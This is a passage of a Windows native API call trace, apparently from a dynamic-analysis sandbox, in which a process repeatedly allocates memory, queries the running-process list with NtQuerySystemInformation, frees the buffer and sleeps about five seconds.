ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0275.600] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0275.601] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0275.601] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0275.602] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0275.606] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0275.606] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0275.608] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0275.609] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0275.610] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0275.610] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0275.610] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0275.616] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0275.617] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0275.618] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0275.618] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0275.619] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0275.620] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0275.620] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0275.625] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0275.626] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0275.628] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0275.629] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0275.630] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0275.630] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0275.630] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0275.636] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0275.637] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0275.638] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0275.638] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0275.640] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0275.640] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0275.640] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0275.646] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0275.647] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0275.649] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0275.650] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0275.651] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0275.651] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0275.652] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0275.657] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0275.658] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0275.660] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0275.661] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0275.662] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0275.662] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0275.663] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0275.668] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0275.669] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0275.671] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0275.671] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0275.672] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0275.673] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0275.673] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0275.679] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0275.680] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0275.682] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0275.682] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0275.683] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0275.684] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0275.684] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0275.689] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0275.690] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0275.691] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0275.691] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0275.693] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0275.693] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0275.693] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0275.697] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0275.698] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0275.700] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0275.700] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0275.701] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0275.702] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0275.702] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0275.707] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0275.708] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0275.709] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0275.709] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0275.710] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0275.710] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0275.710] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0275.715] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0275.716] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0275.717] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0275.717] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0275.718] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0275.718] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0275.718] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0275.722] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0275.723] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0275.725] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0275.725] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0275.726] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0275.726] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0275.726] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0275.730] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0275.731] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0275.738] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0275.738] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0275.739] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0275.740] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0275.740] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0275.745] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0275.745] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0275.747] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0275.748] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0275.749] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0275.749] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0275.749] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0275.755] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0275.756] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0275.777] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0275.777] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0275.778] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0275.778] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0275.778] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0275.783] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0275.784] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0275.786] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0275.786] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0275.787] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0275.788] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0275.788] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0275.792] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0275.793] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0275.794] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0275.795] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0275.796] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0275.796] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0275.796] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0275.801] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0275.802] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0275.804] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0275.804] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0275.805] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0275.805] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0275.805] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0275.810] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0275.811] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0275.812] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0275.813] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0275.814] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0275.814] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0275.814] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, 